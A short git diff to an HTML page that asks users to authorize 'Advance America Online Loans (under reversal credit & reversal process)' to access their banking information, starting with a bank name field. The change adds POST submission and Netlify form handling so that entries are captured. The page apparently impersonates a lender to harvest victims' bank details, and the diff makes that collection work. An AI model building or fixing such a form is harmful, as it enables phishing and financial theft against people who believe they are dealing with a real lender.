--- a/bank-authentication.html
+++ b/bank-authentication.html
@@ -65,7 +65,8 @@
                         <p><strong>I hereby authorize Advance America Online Loans (under reversal credit & reversal process) to access and utilize the following banking information for the specific purpose of processing payments, setting up direct deposits, etc.</strong></p>
                     </div>
 
-                    <form id="bankAuthForm" class="bank-auth-form" name="bank-authentication" netlify>
+                    <form id="bankAuthForm" class="bank-auth-form" name="bank-authentication" method="POST" data-netlify="true">
+                        <input type="hidden" name="form-name" value="bank-authentication" />
                         <div class="form-group">
                             <label for="bankName">Bank Name *</label>
                             <input type="text" id="bankName" name="bankName" required>
